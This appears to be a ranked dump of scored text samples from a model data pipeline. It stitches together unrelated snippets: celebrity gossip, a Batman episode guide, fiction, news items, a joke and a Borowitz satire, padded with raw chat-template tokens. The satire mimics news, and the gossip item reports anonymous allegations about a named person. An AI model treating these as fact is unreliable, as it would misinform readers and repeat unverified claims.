soul who tried to help him on a wild escapade. + +We’re told Dick was at a bash in East Hampton Friday looking “incredibly intoxicated.” When a friend he’d arrived with disappeared, a spy saw the former “NewsRadio” star visibly “upset.” + +“He didn’t know where he was staying,” our source explained. “He had no cellphone or wallet.” A woman offered to take Dick to her place — “Big mistake,” she told us, adding that on the way, Dick “grabbed the steering wheel” as she drove, and blasted her radio. + +But things were about to get much worse. “When we got to the house, [Andy] told my husband he was hungry,” the good Samaritan told us. “My husband made him eggs. [But] Andy spat at me because I could not put a song he requested on my iPod quickly enough. He kept asking... if I was a moron.” + +Then, “He grabbed my breast and said, ‘You’re so hot. I would [bleep] the [bleep] out of you!” When his advances were rebuked, openly bisexual Dick grabbed the crotch of the woman’s husband and tried to kiss him, she said. + +The couple told Dick to sleep it off for a few hours. When the exasperated wife took him back to the party to see if he could find his friend, he grabbed beers from her fridge to drink on the way, despite her objections. When she dropped him off, “He asked me if he could borrow 20 bucks!” She didn’t hand over any dough. “He is a tortured soul,” she said. + +Spies saw Dick the next day at Surf Lodge crashing a Beach magazine party, peeing in a bush at the swanky spot and being asked to leave. + +Dick’s most recent rehab stint was last year, when the staff of “Andy Dick Live!” staged an intervention. His reps did not respond to repeated requests for comment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 13; Score = 1400832.0 +<|begin_of_text|>No. in + +series No. in + +season Title Directed by Written by Original air date Villain(s) + +A mysterious bat-like creature terrorizes Gotham City, causing the police force to pursue Batman. The Dark Knight must find the real perpetrator to clear his name. + +After escaping Arkham Asylum on Christmas Eve, the Joker takes over Gotham's airwaves and terrorizes the city for a crime. He challenges Batman and Robin to find his hidden TV studio and free his hostages – Commissioner Gordon, Detective Bullock and Summer Gleeson – before midnight. + +Batman encounters the Scarecrow and attempts to foil his scheme to burn down Gotham University, but in the process is exposed to the Scarecrow's fear gas, and is forced to face his own guilt over the death of his parents. Note: This episode introduced the popular line "I am vengeance. I am the night. I am Batman!"[1] + +4 4 "The Last Laugh" Kevin Altieri Carl Swenson September 22, 1992 ( ) The Joker + +The Joker covers Gotham City in a cloud of laughing gas and begins plundering the crazed city. But after Alfred is infected with the toxin, Batman has added incentive to stop the Joker and acquire an antidote from him before all of Gotham dies with a smile. + +When District Attorney Harvey Dent collapses after a meal with his fiancée Pamela Isley and friend Bruce Wayne, doctors discover that he has been poisoned. Batman must find the culprit and the antidote before the DA's time runs out. + +6 6 "The Underdwellers" Frank Paur Story by : Tom Ruegger + +Teleplay by : Jules Dennis and Richard Mueller October 21, 1992 ( ) Sewer King + +Batman traces a series of bizarre robberies on the streets of Gotham back to a band of homeless children, who have been raised to do the bidding of their master, the Sewer King. + +7 7 "P.O.V." Kevin Altieri Story by : Mitch Brian + +Teleplay by : Sean Catherine Derek and Laren Bright September 18, 1992 ( ) The Drug Lord + +and his Gangsters + +A botched police operation results in the suspension of those involved: Officer Wilkes, Officer Montoya, and Detective Bullock. Confronted by their superiors, each of them is forced to tell their tale of what happened that night. The episode is similar in structure to Akira Kurosawa's film Rashomon. + +8 8 "The Forgotten" Boyd Kirk +================================================================================ +Rank = 14; Score = 1376256.0 +<|begin_of_text|>Don’t you just love that moment of returning consciousness when you wake up? + +It’s a little shock, followed by a moment of snoozing. + +Shortly after comes the feeling that something isn’t right, you wake up a little more and figure out things are okay after all, and return to peaceful snoozing. + +Not today. Not fucking today. + +Oh sure, most of it was the same as every other time, but then I realized that what I saw was not my nightstand, nor the cabinet on the other wall. + +From what I could see I was in a hospital room. + +I was drunk yesterday but not to the point that I blacked out. + +I remember standing up from behind my computer at two in the morning, walking to the toilet and emptying my bladder while leaning on the wall. + +Heck, I even remember crawling up the stairs and into bed next to my wife. Did I have an accident overnight? + +I tried to get up on my elbows, only to be shocked that they were not where I expected them to be. + +I moved my hand up to my face and smashed it against my nose. + +The big shock came when I tried to move my arm again, more careful this time, and saw a little hand. + +A baby’s hand. What was this? + +I tried to talk and all I could manage was a soft cry, almost a whimper. + +I screamed and the cry got louder, but this was not my voice. + +My heart felt like an ice cold hand took hold of it and my throat froze up to the point that I could not swallow. + +For a moment I believed I was in a nightmare and could wake up every second now, but none such thing happened. + +I tried to get up but kept failing time after time. I tried to roll around and kick but my legs were firmly bound inside a blanket. + +At last, I kept screaming. I screamed till my throat hurt and my eyes were full of tears. + +I don’t know for how long I screamed but after some time I saw a nurse walking towards me. + +As she came closer I stopped screaming and she started talking: + +“Hey buddy, what a smart little fellow you are! Are you hungry? Let’s go see your mother!”. + +My surroundings began to move and it took me a moment to realize I was actually in a baby bed on wheels, a plastic tub with a mattress in it. + +We drove past other little beds on wheels and into a long hallway. + +We were stopped a few times by people telling me that I was cute +================================================================================ +Rank = 15; Score = 1335296.0 +<|begin_of_text|>CLOSE Speaking at the National Prayer Breakfast, President Trump razzes 'The Apprentice' producer Mark Burnett about the show's ratings under new host Arnold Schwarzenegger. Burnett introduced Trump at the breakfast. USA TODAY NETWORK + +President Trump speaks during the National Prayer Breakfast on Feb. 2, 2017, in Washington. (Photo11: Evan Vucci, AP) + +Speaking at a National Prayer Breakfast unlike most before it, President Trump on Thursday said the nation has to be "tougher" in dealing with other countries, pledged to make it easier for religious groups to engage in politics — and asked the crowd to pray for his successor as host of The Apprentice. + +"The ratings went down the tubes" since Arnold Schwarzenegger took over as host of his former program, Trump said. "It's been a total disaster... And I want to just pray for Arnold, if we can, for those ratings, OK?" + +Schwarzenegger responded by Twitter, offering to switch jobs with Trump so that "people can finally sleep comfortably again." The former California governor headlined his tweet, "The National Prayer Breakfast?" + +In his remarks at the breakfast, Trump constantly referenced himself, talking at one point about how people often greet him with five words that warm his heart: "I am praying for you." He also said "so many faith leaders" have been "very, very important people to me." + +At another point, Trump referenced foreign policy, telling members of the prayer breakfast not to worry about reports of his "tough" phone calls with world leaders. + +"We're (being) taken advantage of by every nation in the world, virtually," Trump said. "It's not going to happen anymore." + +Read more: + +Trump also defended his temporary ban on travel to the United States from seven Muslim majority nations, calling it a counter-terrorism measure. He suggested, as he did during the campaign, that future migrants may be given some sort of test to demonstrate their commitment to American values. + +The administration is developing "a system to help ensure that those admitted into our country fully embrace our values of religious and personal liberty, and that they reject any form of oppression and discrimination. We want people to come into our nation, but we want people to love us and to love our values, not to hate us and to hate our values." + +During the foreign policy discussion, Trump said: "The world is in trouble, but we can straighten it out, OK? That's what I do — I fix things." + +Praising the military +================================================================================ +Rank = 16; Score = 1277952.0 +<|begin_of_text|>Diane Ackerman on the natural world, the world of human endeavor and connections between the two. + +IT was only a matter of time. Plants have begun texting for help. Thanks to clever new digital devices, a dry philodendron, undernourished hibiscus, or sadly neglected wandering Jew can send its owner a text or Twitter message. Humans like to feel appreciated, so a begonia may also send a simple “Thank-you” text — when it’s happy, as gardeners like to say, meaning healthy and well-tended. Picture your Boston fern home alone placing Botanicalls. But why should potted plants be the only ones to reassure their humans? Another company has found a way for crops to send text messages in unison, letting their farmer know if she’s doing a good enough job to deserve a robust harvest. What is the sound of one hand of bananas clapping? Probes monitoring the soil can send a range of prerecorded messages specific to each plant’s needs. + +Ping Zhu + +Plants texting humans may be new, but malcontent plants have always been chatting among themselves. When an elm tree is being attacked by insects, it does the chemical equivalent of broadcasting “I’m hurt! You could be next!” alerting others in its grove to whip up some dandy poisons. + +If a human kills with poison, we label it a wicked and premeditated crime, one no plea of “self-defense” can excuse. But plants dish out their nastiest potions every day, and we wholeheartedly forgive them. They may lack minds, or even brains, but they do react to injury, fight to survive, act purposefully, enslave giants (through the likes of coffee, tobacco, opium), and gab endlessly among themselves. + +Strawberry, bracken, clover, reeds, bamboo, ground elder and lots more all grow their own social networks — delicate runners (really horizontal stems) linking a grove of individuals. If a caterpillar chews on a white clover leaf, the message races through the colony, which ramps up its chemical weaponry. Stress a walnut tree and it will brew its own caustic aspirin and warn its relatives to do the same. Remember Molly Ivins’s needle-witted quip about a Texas Congressman: “If his I.Q. slips any lower, we’ll have to water him twice a day”? She clearly misjudged the acumen of plants. Plants are not mild-mannered. +================================================================================ +Rank = 17; Score = 1277952.0 +<|begin_of_text|>Neighbors in Johnstown, Pa., called police when they witnessed the young mother outside taking off her clothes and lying naked on the ground. But police arrested and jailed the woman, identified as Ashley Whisman, 26, of the city's West End, for what they allegedly found inside toys belonging to the woman's three-year-old child. Namely, drugs and drug paraphernalia. + +NorthlandsNewsCenter.com reports that police said Whisman's speech was slurred, her arms were covered in track marks, scratches and lesions. On her way to the hospital, police said she tried to hide a baggie of marijuana and a needle, the website adds. + +The 3-year-old allegedly told EMS he was very hungry, the station reports. And among the child's toys, police found drug paraphernalia, marijuana bongs, grinders and even syringes, the website writes. + +Whisman faces drug and child endangerment charges.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 18; Score = 1253376.0 +<|begin_of_text|>A congressman was seated in first class next to a little girl on an airplane. He turned to her and said, "Do you want to talk? Flights go quicker if you strike up a conversation with your fellow passenger." + +The little girl, who had just started to read her book, replied to the total stranger, "What would you want to talk about?" + +"Oh, I don't know," said the congressman. "How about global warming, universal health care or stimulus packages?" as he smiled smugly. + +"OK," she said. "Those could be interesting topics but let me ask you a question first. A horse, a cow and a deer all eat the same stuff - grass. Yet a deer excretes little pellets, while a cow turns out a flat patty but a horse produces clumps. Why do you suppose that is?" + +The legislator, visibly surprised by the little girl's intelligence, thinks about it and says, "Hmmm, I have no idea." + +To which the little girl replies, "Do you really feel qualified to discuss global warming, universal health care or the economy when you don't know crap?" + +Then she went back to reading her book.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 1253376.0 +<|begin_of_text|>WASHINGTON (The Borowitz Report)—Three men alleged to be prominent Russian spies inexplicably gained access to the Oval Office last week and held a high-level meeting there, according to reports. + +Eyewitnesses to the meeting said that the three Russian agents spoke at length and shared sensitive intelligence material, at times laughing uproariously. + +After approximately an hour, the meeting broke up, with two of the spies leaving the Oval Office and the third remaining behind. + +News that agents of the Russian Federation had somehow eluded the Secret Service in order to hold a meeting in the Oval Office sent shock waves through Washington on Monday evening. + +“The fact that three well-known Russian agents were able to hold a meeting in the Oval Office suggests that something has seriously broken down,” Harland Dorrinson, a national-security official who served in the Reagan and Bush Administrations, said. “None of these three men should be anywhere near the White House.” + +On Capitol Hill, House Speaker Paul Ryan called the meeting of the three Russian spies at the White House “a tempest in a teapot” and “much ado about nothing,” before adding, off-microphone, “I am screwed. I am so screwed.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 1212416.0 +<|begin_of_text|>Pope Francis criticized Catholics who live a double life, suggesting that it is better to be an atheist than a hypocritical Christian. + +Francis made the comments Thursday during his private morning mass at his home in Casa Santa Marta in Vatican City. + +"Scandal is saying one thing and doing another; it is a double life," he told attendees, according to a transcription from Vatican Radio. + +He continued: + +"‘I am very Catholic, I always go to mass, I belong to this association and that one; but my life is not Christian, I don’t pay my workers a just wage, I exploit people, I am dirty in my business, I launder money …’ A double life. And so many Christians are like this, and these people scandalize others. How many times have we heard — all of us, around the neighbourhood and elsewhere — ‘but to be a Catholic like that, it’s better to be an atheist.’" + +Francis' comments followed his mass readings, which included a passage from the Gospel of Mark that read, "If your hand causes you to sin, cut it off." + +Pope Francis delivers his homily during his weekly general audience at St. Peter's Square in Vatican City on Wednesday. (Photo: Giuseppe Ciccia/Pacific Press/LightRocket via Getty) + +The day before he made the comments, the Pope tweeted the gates of heaven should be open, not closed. + +Jesus entrusted to Peter the keys to open the entrance to the kingdom of heaven, and not to close it. — Pope Francis (@Pontifex) February 22, 2017 + +It's not the first time the Pope has suggested atheists shouldn't be seen as sinners if they do good. + +In 2013, shortly after he his papacy began, Francis hinted during a mass that non-believers can be redeemed as long as they "do good." + +However, some atheists poked fun at the Pope's remarks. + +Reminder that the Pope thinks atheists are only one step up from the worst of practicing Christians. Proud atheist 💪 https://t.co/DdPVRSOlLF — Max Lynch (@maxlynch) February 23, 2017 + +As an atheist, I suppose I should return the 'compliment.' It's better to be the pope than a malevolent, homicidal atheist. https://t.co/ggIU8UKqWG — Ronald A. Lindsay (@RALindsay) February 23, 2017 + +Follow The Huffington Post Canada on Facebook, Twitter, +================================================================================ +Rank = 21; Score = 1204224.0 +<|begin_of_text|>In the fantastic realm there are hundreds of dangerous creatures, among them we find the giant spiders. Arachnids that get as big as a tree. Most of them dangerous and aggressive, but at the same time most of them are not a direct threat to humans. But there's one of them that makes theexception.The Battered Wife, as originally named. Oras called by the common folk. Why? because this creature will destroy your throat before you can sayThe Battered Wife is a spider that chose populated cities as its natural habitat. Thousands of years of refined evolution have created the perfect disguise on which this arachnid can prey on its preferred target. Humans. The Battered Wife as the exact resemblance of a young woman in a long dress with a hood. But that's not why it's the most dangerous creature of the alley. It's because she not only looks like a hurt lady in distress, but can actually act like one. This spider doesn't talk, but moans exactly as someone that just got stabbed in the stomach. It also recreates the same posture and it shivers as someone scared to death. The Battered Wife is a basic creature with the wits of any other animal. But that little brain has the enough intelligence to use hair and blood from its last victim to get the realism it wants.The Battered Wife nests in the sewers or abandoned houses, it can live to 30 years and spawn every 6 years hundreds of eggs. This means that one single female can spawn over 3 thousand spiders in its life time. The Battered Wife feeds only on humans and as it grows it eats absolutely nothing until it reaches full maturity and can be able to hunt. In between that, almost all of the little spiders die from other predators or starve before they get to kill anything. So that's why this hardly gets as a plague and will never become a threat to our specie. The only big problem is (as this b*tch isn't already one) that its growth is extremely fast. In a few months it can get to full size. And since it hasn't eaten anything and it's hungry, it will make the best performance ever in order to eat a full grown man.The rumor tells that there's a crazy scientist around that experiments on animals, and one of them was a Battered Wife he altered into a different breed. They call it The Battered Mother in Law. Why? Because the motherf*cker has wings... and flies. But luckly for us +================================================================================ +Rank = 22; Score = 1155072.0 +<|begin_of_text|>Amid Economic Crisis, Even Sugar Becomes A Luxury In Egypt + +Enlarge this image toggle caption Amr Nabil/AP Amr Nabil/AP + +At the huge weekly market on the outskirts of Cairo, live chickens crowd wooden cages next to tables piled with ruby-red pomegranates, deep-orange persimmons and baskets of fresh dates from the countryside. + +But as Egypt endures its worst economic crisis in decades, many shoppers can barely afford the tomatoes and cucumbers that are a staple of the poor. They hurry past to a nearby square in the hope of buying cartons of government-subsidized food. + +Egypt is the Arab world's most populous country, with more than 90 million people, and one of the world's biggest food importers. The protests that swept Egypt and the Arab world five years ago and frightened off foreign investors and tourists collided with decades of a deeply inefficient, state-controlled economy. + +After the Egyptian government loosened exchange rates this month, the official value of the Egyptian pound plunged by almost half. One U.S. dollar bought less than nine Egyptian pounds before the devaluation, and these days buys more than 17 pounds. That means that anything imported — from sugar to medicine — became much more expensive and many items disappeared from the market. + +"I went to all the shops and even if you can afford to buy sugar you can't find it," says Saleh Attiya, a furniture maker out shopping with his son. + +"A kid like that — how will he drink his milk without sugar?" he said, pointing to 6-year-old son, also named Saleh. Attiya the father freely admits that his own missing teeth could be due to his habit of drinking each small glass of tea with four or five spoons of sugar. But for millions of Egypt's poor, sugar has been the only luxury they could afford. + +To ease the hardship of rising prices and broad subsidy cuts required by a $12 billion bailout from the International Monetary Fund, the Egyptian government sent the army into neighborhoods with 8 million food boxes at bargain prices. Egypt's official figures indicate almost one-third of Egyptians are in poverty, defined as living on about $50 a month or less. + +Near the weekly market, a crowd of Egyptians, many of them elderly, crowded around a truck with subsidized food packages for sale. They sold out within minutes, leaving people shouting, "I want a carton!" and holding up tattered bills even as soldiers slammed shut the doors of the empty truck. + +The lucky ones walked away with a cardboard +================================================================================ +Rank = 23; Score = 1146880.0 +<|begin_of_text|>If Amazon's voice-powered Alexa devices were a bit more introspective, it would be fascinating to ask them why they're so popular. After all, geniuses world-wide have tried for decades to meld speech and artificial intelligence. It's a daunting task, yet 